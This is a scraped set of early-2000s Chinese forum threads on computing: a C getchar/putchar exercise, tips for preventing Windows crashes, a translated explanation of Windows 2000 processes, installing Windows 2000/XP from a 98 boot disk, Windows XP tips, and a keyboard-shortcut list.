2.估计你输入的是4吧。注意我以前给你讲过的X++的表达式值和x值的区别。我是倒推的，如果你输入4，X++的值为4<5，x的值为5，然后执行else，x--的值就是5--的值，当然是5了~~~

XTree
无可救药地活着，睡眼朦胧地醒着
世界杯决赛那天我过30岁生日，不冲突吧...

Blueidea Web Team
Moderator Of DW & JS Forum
Chief Police Officer

pixel

终级用户
积分：612
发帖：320
来自：地狱
注册：2001-01-17
 发表于 2001-12-24 17:30:53 按此观看pixel的个人资料 按此发邮件给pixel pixel 的 oicq 是10242437,查看 10242437 的资料 发送悄悄话给pixel 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看pixel的IP
据友人问答：完全正确！

：：：抬起高贵的头，做最自由的呼吸：：：
上一贴 | 下一贴
快速回复 主题：再请教两道C的问题
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]


再请教C - 经 典 论 坛

计算机技术
再请教C

上一贴 | 下一贴
发表人 主题: 再请教C
梅友酷子

初级用户
积分：73
发帖：29
来自：
注册：2001-10-08
 发表于 2001-12-27 08:26:17 按此观看梅友酷子的个人资料 该用户不允许显示它的电子邮件 收藏该主题供以后查看 发送悄悄话给梅友酷子 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看梅友酷子的IP
1.输入为"quert?"时，下面的程序的结果是（ ）
＃include<stdio.h>
main()
{while(putchar(getchar())!='?';
}
答案为quert?

2.输入为"quert?"时，下面的程序的结果是（ ）
＃include<stdio.h>
main()
{char c;
c=getchar();
{while((c=getchar())!='?'）putchar（++c);
}
答案为vfsu
请问这两道的答案是怎么得出的？

POPOEVER

N个蓝色大泡泡
版主
积分：22065
发帖：6045
来自：Keyframe
注册：2000-07-17
 发表于 2001-12-27 15:59:47 按此观看POPOEVER的个人资料 按此发邮件给POPOEVER 访问POPOEVER的主页 POPOEVER 的 oicq 是54888059,查看 54888059 的资料 发送悄悄话给POPOEVER 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看POPOEVER的IP
先申明一下：putchar和getchar的用法我有点忘了

1. 是个循环，putchar()里的变量是getchar()，只要putchar()写屏不写“?”，就一直循环，当然getchar()得到quert?，然后putchar()写屏写到?时，表达式不成立，循环终止，但由于他的判断是来自写屏结果，所以“?”是先写屏后判断。

2. ((c=getchar())!='?')是判断(c=getchar())表达式的值是否不等于“?”，写屏是++C表达式的值，所以应该是C自加后的值，所以getchar()获得的字符值+1应该是ASCII码值+1，所以u+1==v,e+1==f,r+1==s,t+1==u，当(c=getchar())=='?'，循环结束，所以'?'不写屏。至于那个q+1==s为什么不写屏，I don't know，你肯定没写错答案么？

[这消息被POPOEVER编辑过(编辑时间2001-12-27 16:03:43)]

XTree
无可救药地活着，睡眼朦胧地醒着
世界杯决赛那天我过30岁生日，不冲突吧...

Blueidea Web Team
Moderator Of DW & JS Forum
Chief Police Officer

上一贴 | 下一贴
快速回复 主题：再请教C
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]
显示签名 禁止笑脸转换

管理选项： 关闭主题 | 置于顶部 | 移动/归档 | 删除主题

跳转到:

dreamweaver MX 功能探索


防止电脑死机二十五招（转） - 经 典 论 坛

dreamweaver MX 功能探索

计算机技术
防止电脑死机二十五招（转）

上一贴 | 下一贴
发表人 主题: 防止电脑死机二十五招（转）
51WINDOWS

海娃
积分：4495
发帖：1308
来自：湖南－山东
注册：2001-12-02
 发表于 2001-12-27 22:39:54 按此观看51WINDOWS的个人资料 按此发邮件给51WINDOWS 访问51WINDOWS的主页 51WINDOWS 的 oicq 是528173,查看 528173 的资料 收藏该主题供以后查看 发送悄悄话给51WINDOWS 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看51WINDOWS的IP
1.在同一个硬盘上安装太多的操作系统会引起系统死机。

    2.CPU、显示卡等配件不要超频过高，要注意温度，否则，在启动或运行时会莫名其妙地重启或死机。

    3.在更换电脑配件时，一定要插好，因为配件接触不良会引起系统死机。

    4.BIOS设置要恰当，虽然建议将BIOS设置为最优，但所谓最优并不是最好的，有时最优的设置反倒会引起启动或者运行死机。

    5.最好配备稳压电源，以免电压不稳引起死机。

    6.如果有条件的话，加装一个UPS，使电脑在停电后不会造成死机。

    7.对来历不明的软盘和光盘，不要轻易使用，对E－mail中所附的软件，要用KV300、瑞星等杀毒软件检查后再使用，以免传染病毒后，是系统死机。

    8.在应用软件未正常结束时，别关闭电源，否则会造成系统文件损坏或丢失，引起自动启动或者运行中死机。对于Windows98/2000/NT等系统来说，这点非常重要。

    9.在安装应用软件当中，若出现提示对话框“是否覆盖文件”，最好选择不要覆盖。因为通常当前系统文件是最好的，不能根据时间的先后来决定覆盖文件(除非你对文件的时间很在意)。

    10.在卸载软件时，不要删除共享文件，因为某些共享文件可能被系统或者其他程序使用，一旦删除这些文件，会使应用软件无法启动而死机，或者出现系统运行死机。

    11.设置硬件设备时，最好检查有无保留中断号(IRQ)，不要让其他设备使用该中断号，否则引起IRQ冲突，从而引起系统死机。

    12.在加载某些软件时，要注意先后次序，由于有些软件编程不规范，在运行是不能排在第一，而要放在最后运行，这样才不会引起系统管理的混乱。

    13.在运行大型应用软件时(如OFFICE 2000)，不要在运行状态下退出以前运行的程序，否则会引起整个Windows98系统的崩溃。

    14.在内存较小的情况下(如4MB－16MB)，最好不要运行占用内存较大的应用程序，否则在运行时容易出现死机。建议在运行这些程序时应及时保存当前正在使用的文件。

    15.对于系统文件或重要文件，最好使用隐含属性，这样才不致于因误操作而删除或者覆盖这些文件。

    16.修改硬盘主引导记录时，最好先保存原来的记录，防止因修改失败而无法恢复原来的硬盘主引导记录。

    17.最好少用软件的测试版，因为测试版在某方面不够稳定，在使用后会使系统无法启动。

    18.在Windows95/98中尽量不要运行16位应用程序，因为16位的应用程序会与Windows中的32位应用程序产生冲突，从而引起死机或无法启动。

    19.在升级BIOS之前，应确定所升级的BIOS版本，同时应先保存一下原先的版本，以免升级错误而使系统无法启动。

    20.尽量不要使用盗版的软件，因为这些软件里隐藏着大量病毒，一旦执行，会自动修改你的系统，使系统在运行中出现死机。

    21.在机箱中，可能蕴藏了大量的灰尘，灰尘若接触了配件的电路，会使系统不稳定或死机。

    22.在执行磁盘碎片整理的时后，不要运行大型应用软件，否则引起死机。

    23.用杀毒软件检查硬盘期间，不要运行其它的应用程序，以防止系统死机。

    24.在上网的时候，不要一次打开太多的浏览窗口，导致资源不足，引起死机。

    25.在关闭计算机的时候，不要直接使用机箱中的电源按钮，因为直接使用电源按钮会引起文件的丢失，使下次不能正常启动，从而造成系统死机。

    对经常死机朋友，请试试以上方法，相信会对大家有一定的帮助的，有时候要针对具体情况来采取不同的对策，切不可生搬硬套哦!

Blueidea Web Team.
Moderator Of Amphitheater Forum
.::天天学习:好好向上::. www.51windows.com
51window_asp_Beta

上一贴 | 下一贴
快速回复 主题：防止电脑死机二十五招（转）
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]


win2k进程详解(转帖) - 经 典 论 坛

dreamweaver MX 功能探索

计算机技术
win2k进程详解(转帖)

上一贴 | 下一贴
发表人 主题: win2k进程详解(转帖)
2smile

活着就好
积分：1811
发帖：2105
来自：SD
注册：2001-05-13
 发表于 2001-11-06 19:10:33 按此观看2smile的个人资料 按此发邮件给2smile 访问2smile的主页 收藏该主题供以后查看 发送悄悄话给2smile 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看2smile的IP
win2k运行进程详解
=================

Svchost.exe
Svchost.exe文件对那些从动态连接库中运行的服务来说是一个普通的主机进程名。Svhost.exe文件定位
在系统的%systemroot%\system32文件夹下。在启动的时候，Svchost.exe检查注册表中的位置来构建需要
加载的服务列表。这就会使多个Svchost.exe在同一时间运行。每个Svchost.exe的回话期间都包含一组服务，
以至于单独的服务必须依靠Svchost.exe怎样和在那里启动。这样就更加容易控制和查找错误。

Svchost.exe 组是用下面的注册表值来识别。

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Svchost
每个在这个键下的值代表一个独立的Svchost组，并且当你正在看活动的进程时，它显示作为一个单独的
例子。每个键值都是REG_MULTI_SZ类型的值而且包括运行在Svchost组内的服务。每个Svchost组都包含一个
或多个从注册表值中选取的服务名，这个服务的参数值包含了一个ServiceDLL值。
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Service

更多的信息
为了能看到正在运行在Svchost列表中的服务。
开始－运行－敲入cmd
然后在敲入 tlist -s （tlist 应该是win2k工具箱里的冬冬）
Tlist 显示一个活动进程的列表。开关 -s 显示在每个进程中的活动服务列表。如果想知道更多的关于
进程的信息，可以敲 tlist pid。

Tlist 显示Svchost.exe运行的两个例子。
0 System Process
8 System
132 smss.exe
160 csrss.exe Title:
180 winlogon.exe Title: NetDDE Agent
208services.exe
Svcs: AppMgmt, Browser, Dhcp, dmserver, Dnscache, Eventlog, lanmanserver, LanmanWorkstation, LmHosts, Messenger, PlugPlay, ProtectedStorage, seclogon, TrkWks, W32Time, Wmi
220 lsass.exe Svcs: Netlogon,PolicyAgent,SamSs
404 svchost.exe Svcs: RpcSs
452 spoolsv.exe Svcs: Spooler
544 cisvc.exe Svcs: cisvc
556 svchost.exe Svcs: EventSystem,Netman,NtmsSvc,RasMan,SENS,TapiSrv
580 regsvc.exe Svcs: RemoteRegistry
596 mstask.exe Svcs: Schedule
660 snmp.exe Svcs: SNMP
728 winmgmt.exe Svcs: WinMgmt
852 cidaemon.exe Title: OleMainThreadWndName
812 explorer.exe Title: Program Manager
1032 OSA.EXE Title: Reminder
1300 cmd.exe Title: D:\WINNT5\System32\cmd.exe - tlist -s
1080 MAPISP32.EXE Title: WMS Idle
1264 rundll32.exe Title:
1000 mmc.exe Title: Device Manager
1144 tlist.exe
在这个例子中注册表设置了两个组。
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Svchost:
netsvcs: Reg_Multi_SZ: EventSystem Ias Iprip Irmon Netman Nwsapagent Rasauto Rasman Remoteaccess SENS Sharedaccess Tapisrv Ntmssvc
rpcss :Reg_Multi_SZ: RpcSs

smss.exe

csrss.exe

这个是用户模式Win32子系统的一部分。csrss代表客户/服务器运行子系统而且是一个基本的子系统
必须一直运行。csrss 负责控制windows，创建或者删除线程和一些16位的虚拟MS-DOS环境。

explorer.exe
这是一个用户的shell（我实在是不知道怎么翻译shell），在我们看起来就像任务条，桌面等等。这个
进程并不是像你想象的那样是作为一个重要的进程运行在windows中，你可以从任务管理器中停掉它，或者重新启动。
通常不会对系统产生什么负面影响。

internat.exe

这个进程是可以从任务管理器中关掉的。
internat.exe在启动的时候开始运行。它加载由用户指定的不同的输入点。输入点是从注册表的这个位置
HKEY_USERS\.DEFAULT\Keyboard Layout\Preload 加载内容的。
internat.exe 加载“EN”图标进入系统的图标区，允许使用者可以很容易的转换不同的输入点。
当进程停掉的时候，图标就会消失，但是输入点仍然可以通过控制面板来改变。

lsass.exe
这个进程是不可以从任务管理器中关掉的。
这是一个本地的安全授权服务，并且它会为使用winlogon服务的授权用户生成一个进程。这个进程是
通过使用授权的包，例如默认的msgina.dll来执行的。如果授权是成功的，lsass就会产生用户的进入
令牌，令牌别使用启动初始的shell。其他的由用户初始化的进程会继承这个令牌的。

mstask.exe
这个进程是不可以从任务管理器中关掉的。
这是一个任务调度服务，负责用户事先决定在某一时间运行的任务的运行。

smss.exe
这个进程是不可以从任务管理器中关掉的。
这是一个会话管理子系统，负责启动用户会话。这个进程是通过系统进程初始化的并且对许多活动的，
包括已经正在运行的Winlogon，Win32（Csrss.exe）线程和设定的系统变量作出反映。在它启动这些
进程后，它等待Winlogon或者Csrss结束。如果这些过程时正常的，系统就关掉了。如果发生了什么
不可预料的事情，smss.exe就会让系统停止响应（就是挂起）。

spoolsv.exe
这个进程是不可以从任务管理器中关掉的。
缓冲（spooler）服务是管理缓冲池中的打印和传真作业。

service.exe
这个进程是不可以从任务管理器中关掉的。
大多数的系统核心模式进程是作为系统进程在运行。

System Idle Process
这个进程是不可以从任务管理器中关掉的。
这个进程是作为单线程运行在每个处理器上，并在系统不处理其他线程的时候分派处理器的时间。

taskmagr.exe
这个进程是可以在任务管理器中关掉的。
这个进程就是任务管理器。

winlogon.exe
这个进程是管理用户登录和推出的。而且winlogon在用户按下CTRL+ALT+DEL时就激活了，显示安全对话框。

winmgmt.exe
winmgmt是win2000客户端管理的核心组件。当客户端应用程序连接或当管理程序需要他本身的服务时这个进程初始化。

想见不如怀念?
thinktip.com
msn: thinktip@hotmail.com
icq: 98885338
上一贴 | 下一贴
快速回复 主题：win2k进程详解(转帖)
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]


如何用98启动盘安装2000和XP！（不会请进） - 经 典 论 坛

计算机技术
如何用98启动盘安装2000和XP！（不会请进）

上一贴 | 下一贴
发表人 主题: 如何用98启动盘安装2000和XP！（不会请进）
BIGBUG

终级用户
积分：1278
发帖：803
来自：不一定
注册：2001-03-21
 发表于 2001-11-15 13:28:35 按此观看BIGBUG的个人资料 按此发邮件给BIGBUG BIGBUG 的 oicq 是9718783,查看 9718783 的资料 收藏该主题供以后查看 发送悄悄话给BIGBUG 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看BIGBUG的IP
首先建议不论安装什么系统，可能的情况下均选用全新安装

用98启动盘装，为了提高安装速度，强烈建议安装前运行“Smartdrv。exe”先（注意：制作98盘时SmartDrv文件一般没有，可以到98光盘或已安装的98系统中copy一个到启动盘）
过程：
1、放入2000（XP）光碟，插入98启动盘，设置为A：盘启动
2、选择带光驱进入DOS
3、Format c：（如果需要安装许多应用软件且不想经常重装系统，建议c：最好不要低于3G，我用5G）
4、运行启动盘上的SmartDrv（可能需要运行两次或更多，直到你可以在屏幕上看到运行结果，否则从光盘上copy文件的过程将会是场恶梦，特别是XP，有朋友创造过copy8小时的记录）
5、转到光驱盘符下，进入2000光盘的 i386 目录，运行winnt（XP是 i386 下的winnt）
6、之后按提示安装（建议使用NTFS）
7、OK

以上方法在多种机器上均实际安装成功，唯一失败是一台IBM ThinkPad A21m 笔记本（后经多方筹集得到4张软盘制作2000启动盘后，成功安装）

当你没有2000或XP启动盘时且不幸是非启动光盘时，可以使用上述方法，万一真的不行只有多找几张软盘了，现在的软盘到用起来还真不好找

[这消息被BIGBUG编辑过(编辑时间2001-11-15 13:50:22)]

等我想想再签
DW5

阻击之眼
积分：3356
发帖：3063
来自：blueidea
注册：2001-07-29
 发表于 2001-11-15 13:49:37 按此观看DW5的个人资料 按此发邮件给DW5 DW5 的 oicq 是48580488,查看 48580488 的资料 发送悄悄话给DW5 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看DW5的IP
这个谁不会啊？？？？？？？

修身，养性，治国，平天下
BIGBUG

终级用户
积分：1278
发帖：803
来自：不一定
注册：2001-03-21
 发表于 2001-11-15 13:57:04 按此观看BIGBUG的个人资料 按此发邮件给BIGBUG BIGBUG 的 oicq 是9718783,查看 9718783 的资料 发送悄悄话给BIGBUG 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看BIGBUG的IP
DW5在上个帖子中说
引用:
这个谁不会啊？？？？？？？

未必！过程很简单，主要是说明Smartdrv的加载很重要，我认识的很多对电脑很熟悉的人都在阴沟里翻了船

再说水平不一样，初学者还是可以看一看的

等我想想再签
underline

初级用户
积分：0
发帖：2
来自：cz.js.china
注册：2001-11-15
 发表于 2001-11-15 14:25:02 按此观看underline的个人资料 按此发邮件给underline underline 的 oicq 是55660537,查看 55660537 的资料 发送悄悄话给underline 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看underline的IP
看看没什么坏处啊!

命到定时，终须有。
若是无缘，莫强求。
cfluodongyu2

超级用户
积分：336
发帖：84
来自：
注册：2002-05-18
 发表于 2002-05-18 14:16:45 按此观看cfluodongyu2的个人资料 按此发邮件给cfluodongyu2 cfluodongyu2 的 oicq 是17696170,查看 17696170 的资料 发送悄悄话给cfluodongyu2 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看cfluodongyu2的IP
我想请教一下,只把XP光盘中的I386目录复制到硬盘上执行WINNT装不上XP系统怎么办啊,当时屏幕出现了几行英文提示,可惜我是学俄语的没有看懂。我想问一下，光是拷贝I386上当可不可以呀！
小弟先行谢过了！

好的交流能使我们走近完美！
wx@ay

看不懂
积分：7424
发帖：5353
来自：ay.ha.cn
注册：1999-12-23
 发表于 2002-05-18 19:05:37 wx@ay 的 oicq 是1850777,查看 1850777 的资料 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent
WIN2K 只复制I386来安装是没有问题的。
XP没用过 。。。

Think like a Genius.

有些爱情象指甲，有些象牙齿。
指甲能不断生长，不要的就剪掉。
而牙齿就不同。
象牙齿的爱情会不同，它会永远！
小心蛀牙！！！

DW5

阻击之眼
积分：3356
发帖：3063
来自：blueidea
注册：2001-07-29
 发表于 2002-05-19 09:33:29 按此观看DW5的个人资料 按此发邮件给DW5 DW5 的 oicq 是48580488,查看 48580488 的资料 发送悄悄话给DW5 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看DW5的IP
XP的安装和2000是一样的。。。

最好你把所有文件都复制

修身，养性，治国，平天下
上一贴 | 下一贴
快速回复 主题：如何用98启动盘安装2000和XP！（不会请进）
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]


Windows XP技巧十则. - 经 典 论 坛

计算机技术
Windows XP技巧十则.

上一贴 | 下一贴
发表人 主题: Windows XP技巧十则.
len

SlowHorse
积分：1198
发帖：572
来自：hebei
注册：2001-09-29
 发表于 2002-01-23 12:16:38 按此观看len的个人资料 按此发邮件给len 访问len的主页 len 的 oicq 是3248586,查看 3248586 的资料 收藏该主题供以后查看 发送悄悄话给len 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看len的IP
1.关于快速启动工具栏.
快速启动工具栏已从任务栏中小时,如果想找回他,只要在任务栏的空白处右键单击鼠标,在快捷菜单上选择工具栏-快速启动,OK.
2.AVI文件播放冲突.
在98中保存的AVI文件,到了XP中打开,可能会发生冲突.只要打开Windows movie maker,选择查看-选项,取消'自动创建剪辑'项就可以了.
3.锁定计算机.
win2000中的锁定计算机很实用,xp中却找不到了.我们通过建立一个快捷方式就可以实现锁定计算机.在桌面上单击右键,选择新建快捷方式,在命令行框中输入:rundll32.exe user32.dll,LockWorkstation,回车输入快捷方式名称,随便起个名字,完成.
4.有时有些程序我们会经常用到,放在桌面上又显得凌乱.何不把它从开始菜单的程序选项中移到开始菜单的顶部?象windows update一样.只要把鼠标放在想移动的程序链接上,单击鼠标右键,选择'固定在开始菜单上'即可.
5.在关机栏中显示'休眠'.
XP的关机栏中没有了'休眠'选项,我们只要在打开关机对话框的同时,按住shift键,就可以看到休眠选项了.
6.去掉桌面右下角的版本信息.
在桌面空白处单击鼠标右键,选择'属性',点击'桌面'标签,再选择'自定义桌面',在弹出的新窗口中点击'WEB'标签,再'锁定桌面项目'上打勾,按确定.返回桌面属性窗口,按确定.OK.
7.让Windows Messenger不再自动启动.
每次开机,Windows Messenger都会自动启动,在Msconfig中关了也没用.运行regedit,找到HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\MSMSGS主键,将其删掉,重启.OK.
8.避免频繁激活XP.
有时需要重装XP,但激活XP是件麻烦事.我们在第一次激活XP后,将\Windows\system32\下的wpa.dbl文件复制一个作为备份,以后出现需要激活XP的情况,只有把它覆盖同名文件就可以了.
9.用鼠标的滚轮控制网页文字大小.
如果你的鼠标有一个滚轮,在浏览网页时,按住ctrl键,在拨动滚轮,就可以调整网页文字的大小了.
10.禁止自动拨号.
使用XP时,经常会弹出一个自动拨号窗口链接的Internet,怎样关闭它呢?选择开始-设置-控制面板,双击管理工具,在双击服务打开服务列表,找到'Remote Access Auto Connection Manager,双击它打开属性窗口,在'启动类型'中选择'禁用',然后单击下面'服务状态'中的'停止'按钮停止该服务,最后点击确定退出.

UFO Bulletin Board ====> 不明飞行物
ImHow

怎样
积分：2446
发帖：648
来自：::HowHome::
注册：2002-01-16
 发表于 2002-01-23 12:30:33 按此观看ImHow的个人资料 按此发邮件给ImHow 访问ImHow的主页 ImHow 的 oicq 是16407971,查看 16407971 的资料 发送悄悄话给ImHow 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看ImHow的IP
在Message的“选项”有选择是否随windows启动而启动

::古落根门::

唯有不断学习 才能不断进步

上一贴 | 下一贴
快速回复 主题：Windows XP技巧十则.
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]
显示签名 禁止笑脸转换

管理选项： 关闭主题 | 置于顶部 | 移动/归档 | 删除主题

跳转到:

dreamweaver MX 功能探索


Windows快捷键大全（转） - 经 典 论 坛

dreamweaver MX 功能探索

计算机技术
Windows快捷键大全（转）

上一贴 | 下一贴
发表人 主题: Windows快捷键大全（转）
len

SlowHorse
积分：1198
发帖：572
来自：hebei
注册：2001-09-29
 发表于 2001-12-12 09:23:43 按此观看len的个人资料 按此发邮件给len 访问len的主页 len 的 oicq 是3248586,查看 3248586 的资料 收藏该主题供以后查看 发送悄悄话给len 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看len的IP
Windows快捷键大全
F1　　　　　　　　　　　显示当前程序或者windows的帮助内容。
F2　　　　　　　　　　　当你选中一个文件的话，这意味着“重命名”
F3　　　　　　　　　　　当你在桌面上的时候是打开“查找：所有文件”
                        对话框
F10或ALT　　　　　　　　激活当前程序的菜单栏
windows键或CTRL+ESC　　 打开开始菜单
CTRL+ALT+DELETE　　　　 在win9x中打开关闭程序对话框
DELETE　　　　　　　　　删除被选择的选择项目，如果是文件，将被放
                        入回收站
SHIFT+DELETE　　　　　　删除被选择的选择项目，如果是文件，将被直
                        接删除而不是放入回收站
CTRL+N　　　　　　　　　新建一个新的文件
CTRL+O　　　　　　　　　打开“打开文件”对话框
CTRL+P　　　　　　　　　打开“打印”对话框
CTRL+S　　　　　　　　　保存当前操作的文件
CTRL+X　　　　　　　　　剪切被选择的项目到剪贴板
CTRL+INSERT 或 CTRL+C　 复制被选择的项目到剪贴板
SHIFT+INSERT 或 CTRL+V　粘贴剪贴板中的内容到当前位置
ALT+BACKSPACE 或 CTRL+Z 撤销上一步的操作
ALT+SHIFT+BACKSPACE　　 重做上一步被撤销的操作
Windows键+M　　　　　　 最小化所有被打开的窗口。
Windows键+CTRL+M　　　　重新将恢复上一项操作前窗口的大小和位置
Windows键+E　　　　　　 打开资源管理器
Windows键+F　　　　　　 打开“查找：所有文件”对话框
Windows键+R　　　　　　 打开“运行”对话框
Windows键+BREAK　　　　 打开“系统属性”对话框
Windows键+CTRL+F　　　　打开“查找：计算机”对话框
SHIFT+F10或鼠标右击　　 打开当前活动项目的快捷菜单
SHIFT　　　　　　　　　 在放入CD的时候按下不放，可以跳过自动播放
                        CD。在打开word的时候按下不放，可以跳过自
                        启动的宏
ALT+F4　　　　　　　　　关闭当前应用程序
ALT+SPACEBAR　　　　　　打开程序最左上角的菜单
ALT+TAB　　　　　　　　 切换当前程序
ALT+ESC　　　　　　　　 切换当前程序
ALT+ENTER　　　　　　　 将windows下运行的MSDOS窗口在窗口和全屏幕
                        状态间切换
PRINT SCREEN　　　　　　将当前屏幕以图象方式拷贝到剪贴板
ALT+PRINT SCREEN　　　　将当前活动程序窗口以图象方式拷贝到剪贴板
CTRL+F4　　　　　　　　 关闭当前应用程序中的当前文本（如word中）
CTRL+F6　　　　　　　　 切换到当前应用程序中的下一个文本（加shift
                        可以跳到前一个窗口）

在IE中：

ALT+RIGHT ARROW　　　　 显示前一页（前进键）
ALT+LEFT ARROW　　　　　显示后一页（后退键）
CTRL+TAB　　　　　　　　在页面上的各框架中切换（加shift反向）
F5　　　　　　　　　　　刷新
CTRL+F5　　　　　　　　 强行刷新

    目的快捷键

    激活程序中的菜单栏 F10

    执行菜单上相应的命令 ALT+菜单上带下划线的字母

    关闭多文档界面程序中的当

    前窗口 CTRL+ F4

    关闭当前窗口或退出程序 ALT+ F4

    复制 CTRL+ C

    剪切 CTRL+ X

    删除 DELETE

    显示所选对话框项目的帮助 F1

    显示当前窗口的系统菜单 ALT+空格键

    显示所选项目的快捷菜单 SHIFT+ F10

    显示“开始”菜单 CTRL+ ESC

    显示多文档界面程序的系统

    菜单 ALT+连字号(-)

    粘贴 CTR L+ V

    切换到上次使用的窗口或者

    按住 ALT然后重复按TAB，

    切换到另一个窗口 ALT+ TAB

    撤消 CTRL+ Z

    二、使用“Windows资源管理器”的快捷键

    目的快捷键

    如果当前选择展开了,要折

    叠或者选择父文件夹左箭头

    折叠所选的文件夹 NUM LOCK+负号(-)

    如果当前选择折叠了，要展开

    或者选择第一个子文件夹右箭头

    展开当前选择下的所有文件夹 NUM LOCK+*

    展开所选的文件夹 NUM LOCK+加号(+)

    在左右窗格间切换 F6

    三、使用 WINDOWS键

    可以使用 Microsoft自然键盘或含有 Windows徽标键的其他任何兼容键盘的以下快捷键。

    目的快捷键

    在任务栏上的按钮间循环 WINDOWS+ TAB

    显示“查找：所有文件” WINDOWS+ F

    显示“查找：计算机” CTRL+ WINDOWS+ F

    显示“帮助” WINDOWS+ F1

    显示“运行”命令 WINDOWS+ R

    显示“开始”菜单 WINDOWS

    显示“系统属性”对话框 WINDOWS+ BREAK

    显示“Windows资源管理器” WINDOWS+ E

    最小化或还原所有窗口 WINDOWS+ D

    撤消最小化所有窗口 SHIFT+ WINDOWS+ M

    四、使用“我的电脑”和“Windows资源管理器”的快捷键

    目的快捷键

    关闭所选文件夹及其所有父

    文件夹按住 SHIFT键再单击“关闭按钮（仅适用于“我的电脑”）

    向后移动到上一个视图 ALT+左箭头

    向前移动到上一个视图 ALT+右箭头

    查看上一级文件夹 BACKSPACE

    五、使用对话框中的快捷键

    目的快捷键

    取消当前任务 ESC

    如果当前控件是个按钮，要

    单击该按钮或者如果当前控

    件是个复选框，要选择或清

    除该复选框或者如果当前控

    件是个选项按钮，要单击该

    选项空格键

    单击相应的命令 ALT+带下划线的字母

    单击所选按钮 ENTER

    在选项上向后移动 SHIFT+ TAB

    在选项卡上向后移动 CTRL+ SHIFT+ TAB

    在选项上向前移动 TAB

    在选项卡上向前移动 CTRL+ TAB

    如果在“另存为”或“打开”

    对话框中选择了某文件夹，

    要打开上一级文件夹 BACKSPACE

    在“另存为”或“打开”对

    话框中打开“保存到”或

    “查阅” F4

    刷新“另存为”或“打开”

    对话框 F5

    六、使用“桌面”、“我的电脑”和“Windows资源管理器”快捷键

    选择项目时，可以使用以下快捷键。

    目的快捷键

    插入光盘时不用“自动播放”

    功能按住 SHIFT插入 CD-ROM

    复制文件按住 CTRL拖动文件

    创建快捷方式按住 CTRL+SHIFT拖动文件

    立即删除某项目而不将其放入 SHIFT+DELETE

    “回收站”

    显示“查找：所有文件” F3

    显示项目的快捷菜单 APPLICATION键

    刷新窗口的内容 F5

    重命名项目 F2

    选择所有项目 CTRL+ A

    查看项目的属性 ALT+ ENTER或 ALT+双击

    可将 APPLICATION键用于 Microsoft自然键盘或含有 APPLICATION键的其他兼容键

    七、Microsoft放大程序的快捷键

    这里运用Windows徽标键和其他键的组合。

    快捷键目的

    Windows徽标+PRINT SCREEN将屏幕复制到剪贴板（包括鼠标光标）

    Windows徽标+SCROLL LOCK将屏幕复制到剪贴板（不包括鼠标光标）

    Windows徽标+ PAGE UP切换反色。

    Windows徽标+ PAGE DOWN切换跟随鼠标光标

    Windows徽标+向上箭头增加放大率

    Windows徽标+向下箭头减小放大率

    八、使用辅助选项快捷键

    目的快捷键

    切换筛选键开关右SHIFT八秒

    切换高对比度开关左ALT+左SHIFT+PRINT SCREEN

    切换鼠标键开关左ALT+左SHIFT+NUM LOCK

    切换粘滞键开关 SHIFT键五次

    切换切换键开关 NUM LOCK五秒

UFO Bulletin Board ====> 不明飞行物
yunbin

经典强盗
现任版主
积分：2397
发帖：1033
来自：火星
注册：2001-09-27
 发表于 2001-12-12 09:48:36 按此观看yunbin的个人资料 按此发邮件给yunbin 访问yunbin的主页 yunbin 的 oicq 是2369009,查看 2369009 的资料 发送悄悄话给yunbin 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yunbin的IP
让大家熟悉一下吧~帮你顶一下~

A man can succeed at almost anything
for which he has unlimited enthusiasm.

Blueidea Web Team
Moderator Of Computer Technology Forum

len

SlowHorse
积分：1198
发帖：572
